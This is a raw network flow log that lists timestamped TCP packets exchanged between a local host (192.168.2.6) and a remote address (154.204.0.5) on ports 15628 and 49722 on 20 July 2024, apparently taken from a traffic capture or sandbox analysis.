Jul 20, 2024 16:31:25.742218018 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.742281914 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.749397039 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.749454021 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.755208015 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.755274057 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.761219978 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.761280060 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.766534090 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.766586065 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.772053003 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.772175074 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.778563976 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.778618097 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.783777952 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.783838034 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.789120913 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.789175987 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.794262886 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.794315100 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.800146103 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.800216913 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.805330038 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.805386066 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.810542107 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.810602903 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.815927029 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.815979958 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.821023941 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.821088076 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.826493025 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.826545000 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.833395004 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.833451033 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.839128971 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.839183092 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.844403028 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.844459057 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.851480961 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.851537943 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.856580019 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.856631994 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.863447905 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.863500118 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.874305964 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.874365091 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.880371094 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.880485058 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.888381958 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.888433933 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.894484997 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.894546986 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.909157991 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.909230947 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.923717976 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.923779011 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.933279991 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.933339119 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.942444086 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.942508936 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.975032091 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.977849960 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.977900982 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.982364893 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.982431889 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.990346909 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.990389109 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.057960987 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.210707903 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.252969027 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.275466919 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.296257973 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.299280882 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.455275059 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.455394030 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.463320017 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.463367939 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.463395119 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.464076996 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.464076996 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.465456009 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.465487003 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.465513945 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.465538979 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.465564966 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.465591908 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.465758085 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.465776920 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.465776920 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.465776920 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.465785980 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.465815067 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.467698097 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.480175018 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.480204105 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.480231047 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.483792067 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.483792067 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.485982895 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.486011028 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.486032963 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.486037970 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.486063957 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.486089945 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.486114979 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.486140966 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.486166954 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.486192942 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.486218929 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.487164974 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.497479916 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.497508049 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.497534990 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.497771025 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.497771978 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.499927998 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.503859997 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.504199982 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.504959106 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.507813931 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.509463072 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.512001991 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.515047073 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.515870094 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.517054081 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.520041943 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.520975113 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.523818970 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.525639057 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.527607918 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.529156923 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.531821966 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.532850027 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.536113977 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.538758039 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.539787054 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.544192076 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.545288086 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.547921896 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.553101063 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.555752993 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.561038017 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.563950062 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.583889961 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.604402065 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.609153032 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.612077951 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.618834972 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.619353056 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.620109081 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.620588064 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.623688936 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.626856089 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.628317118 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.628880024 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.632920980 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.638735056 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.639115095 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.647512913 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.652112007 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.658868074 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.660852909 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.669362068 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.672331095 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.679680109 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.683763981 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.699709892 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.700360060 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.706651926 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.708462000 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.715533972 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.715646029 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.721745968 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.723927975 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.729872942 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.733597040 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.738559961 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.740281105 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.745737076 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.748089075 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.753715038 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.755950928 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.760951996 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.761063099 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.766078949 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.766192913 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.772134066 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.775791883 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.783679962 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.787873030 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.792958975 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.795916080 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.801269054 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.803915977 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.815639973 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.815776110 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.836817026 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.842858076 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.843051910 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.843153954 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.850608110 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.851836920 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.858392000 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.858633995 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.865402937 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.865746021 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.872598886 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.872698069 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.878685951 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.878778934 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.884715080 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.884861946 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.890186071 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.890403032 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.896719933 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.896903038 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.901782990 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.905003071 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.910667896 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.910789967 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.921045065 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.921406031 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.927099943 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.927285910 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.933012009 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.933254957 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.939932108 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.940043926 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.946480036 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.949613094 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.954821110 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.955598116 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.962318897 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.962523937 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.969496965 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.973598003 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.983020067 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.983234882 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.991312027 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.991471052 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:26.996922970 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:26.997133970 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.002505064 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.005589008 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.014971018 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.017759085 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.023454905 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.023590088 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.030560017 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.030786991 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.035703897 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.036051035 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.041194916 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.045819044 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.050820112 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.051297903 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.056574106 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.056709051 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.063692093 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.063900948 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.069006920 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.069194078 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.077661037 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.077816010 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.085863113 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.086081982 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.096257925 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.096487045 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.104032040 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.104367971 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.111500025 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.111632109 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.116729021 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.120198011 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.138871908 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.140002012 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.149197102 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.158004999 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.163288116 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.164505005 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.172638893 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.176306963 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.181866884 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.183907032 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.191826105 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.191978931 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.197274923 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.200143099 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.205791950 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.208508015 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.214373112 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.215574980 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.220825911 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.224154949 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.229480028 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.231682062 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.236638069 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.240248919 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.245587111 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.247723103 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.254650116 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.256438017 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.262680054 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.263721943 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.269026995 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.272169113 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.277167082 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.279598951 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.301228046 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.315638065 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.316071987 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.336544991 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.336798906 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.344294071 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.348189116 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.368081093 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.368459940 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.374013901 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.375838041 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.381040096 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.384423971 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.389528990 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.391855955 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.397170067 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.400443077 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.405865908 CEST	15628	49722	154.204.0.5	192.168.2.6
